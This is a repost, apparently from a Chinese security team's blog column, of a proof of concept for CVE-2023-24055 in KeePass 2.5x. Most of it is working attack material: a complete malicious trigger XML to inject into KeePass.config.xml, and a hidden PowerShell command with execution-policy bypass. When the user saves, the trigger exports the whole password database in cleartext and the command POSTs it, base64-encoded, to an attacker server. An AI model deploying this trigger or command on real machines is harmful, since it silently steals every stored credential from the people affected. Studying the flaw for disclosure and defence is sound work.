首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >CVE-2023-24055 PoC(KeePass 2.5x)

CVE-2023-24055 PoC(KeePass 2.5x)

作者头像
Khan安全团队
发布2023-02-23 14:43:10
发布2023-02-23 14:43:10
8410
举报
文章被收录于专栏:Khan安全团队Khan安全团队

(1) 对 KeePass 配置文件具有写入权限的攻击者KeePass.config.xml可以注入以下触发器,例如:

代码语言:javascript
复制
<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Triggers>
    <Trigger>
      <Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
      <Name>exploit</Name>
      <Events>
        <Event>
          <TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
          <Parameters>
            <Parameter>0</Parameter>
            <Parameter />
          </Parameters>
        </Event>
      </Events>
      <Conditions />
      <Actions>
        <Action>
          <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
          <Parameters>
            <Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
            <Parameter>KeePass XML (2.x)</Parameter>
            <Parameter />
            <Parameter />
          </Parameters>
        </Action>
        <Action>
          <TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
          <Parameters>
            <Parameter>PowerShell.exe</Parameter>
            <Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
            <Parameter>False</Parameter>
            <Parameter>1</Parameter>
            <Parameter />
          </Parameters>
        </Action>
      </Actions>
    </Trigger>
  </Triggers>
</TriggerCollection>

(2) 受害者将打开 keePass 作为正常活动,保存更改等......,触发器将在后台执行,将凭据泄露给攻击者服务器

触发 PoC 详细信息

KeePass XML (2.x) formata) 触发器会将包含所有凭据的 keepass 数据库导出到以下(cleartext) 路径中,例如:

代码语言:javascript
复制
c:\Users\John\AppData\Local\Temp\exploit.xml 

b) 导出文件后,可以定义第二个操作来使用Powershell.exe和编码为exfiltrate XML 数据,base64例如:

代码语言:javascript
复制
PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

c) 数据将泄露到攻击者的 Web 服务器,例如:

触发 PoC 值

代码语言:javascript
复制
Name: Trigger
Events: Saved database file | [Equals]
Conditions: <empty>
Actions: 

(1) Export active database 
File/URL: c:\Users\John\AppData\Local\Temp\exploit.xml
File/Fortmat:  KeePass XML (2.x)

(2) Execute command line / URL
File/URL: PowerShell.exe
Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))
Window style: Hidden

证书...

代码语言:javascript
复制
PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password

https://github.com/alt3kx/CVE-2023-24055_PoC

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-01-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 触发 PoC 详细信息
  • 触发 PoC 值
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档